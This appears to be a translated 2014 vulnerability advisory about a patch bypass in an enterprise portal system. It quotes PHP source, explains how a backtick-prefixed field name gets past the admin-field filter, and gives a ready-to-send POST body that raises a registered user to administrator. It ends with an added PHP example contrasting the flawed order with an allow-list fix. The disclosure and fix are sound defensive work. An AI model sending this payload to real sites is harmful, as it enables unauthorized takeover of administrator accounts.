Cicada-known Enterprise Portal System v2.5.1: patch bypass allows continued injection (vulnerability warning)

2014-10-03T00:00:00
ID MYHACK58:62201454276
Type myhack58
Reporter Anonymous
Modified 2014-10-03T00:00:00

Description

/system/module/user/model.php

public function update($account)
{
    /* If the user want to change his password. */
    if($this->post->password1 != false)
    {
        $this->checkPassword();
        if(dao::isError()) return false;
        $password = $this->createPassword($this->post->password1, $account);
        $this->post->set('password', $password);
    }

    $user = fixer::input('post')
        ->cleanInt('imobile, qq, zipcode')
        ->setDefault('admin', 'no')
        ->remove('ip, account, join, visits')
        ->removeIF(RUN_MODE != 'admin', 'admin')
        ->get();

    return $this->dao->update(TABLE_USER)
        ->data($user, $skip = 'password1,password2')
        ->autoCheck()
        ->batchCheck($this->config->user->require->edit, 'notempty')
        ->check('email', 'email')
        ->check('email', 'unique', "account!='$account'")
        ->checkIF($this->post->gtalk != false, 'gtalk', 'email')
        ->where('account')->eq($account)
        ->exec();
}

In this method the admin field is checked: removeIF() drops it from the POST data unless RUN_MODE is 'admin'.

Now look at the data() method in /system/lib/dao/dao.class.php:

public function data($data, $skipFields = '')
{
    $this->data = $data;
    if($skipFields) $skipFields = ',' . str_replace(' ', '', $skipFields) . ',';

    foreach($data as $field => $value)
    {
        // Strip backticks and commas from the field name.
        $field = str_replace('`', '', $field);
        $field = str_replace(',', '', $field);
        if(strpos($skipFields, ",$field,") !== false) continue;
        $this->sql .= "$field = " . $this->quote($value) . ',';
    }

    $this->sql = rtrim($this->sql, ','); // Remove the last ','.
    return $this;
}

data() removes the ` symbol from field names.

If we submit `admin, it bypasses the check; once it reaches data(), the ` is removed and the name is reduced back to admin, leading to elevation of privilege to administrator.

As a registered user, modify your profile information and POST:

realname=aaaaaa'&email=z%40qq.com&password1=&password2=&company=&address=&zipcode=&mobile=&phone=&`admin=super

The account can then be raised to administrator.
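The order-of-operations flaw described above, modelled next to an exact-match allow-list. This is an added example, not code from the original advisory or from the product; the function names and the list of editable columns are assumptions.

```php
<?php
// Added example; function names and the column list are hypothetical.

// Models the order of operations described above: the deny-list runs on the
// raw field name, and the name is normalised only afterwards (as in data()).
function denyThenNormalize(array $post, bool $adminMode): array
{
    if (!$adminMode) unset($post['admin']);
    $columns = [];
    foreach ($post as $field => $value) {
        $columns[str_replace(['`', ','], '', (string) $field)] = $value;
    }
    return $columns;
}

// Hardened form: field names must match an allow-list exactly. A name that
// is not already a known column is dropped, never "cleaned" into one.
function allowListOnly(array $post, bool $adminMode): array
{
    // Assumed set of user-editable columns.
    $allowed = ['realname', 'email', 'password', 'company',
                'address', 'zipcode', 'mobile', 'phone'];
    if ($adminMode) $allowed[] = 'admin';

    $columns = [];
    foreach ($post as $field => $value) {
        if (in_array((string) $field, $allowed, true)) $columns[$field] = $value;
    }
    return $columns;
}

// Constructed request body, shaped like the one in the write-up.
$post = ['realname' => 'aaaaaa', 'email' => 'z@qq.com', '`admin' => 'super'];

echo 'deny-list then normalise: ', json_encode(denyThenNormalize($post, false)), PHP_EOL;
echo 'exact allow-list:         ', json_encode(allowListOnly($post, false)), PHP_EOL;
```

The first function still emits an admin column for a non-admin request, because the filter and the SQL builder disagree about what the field is called; the second never lets the mangled name reach the query.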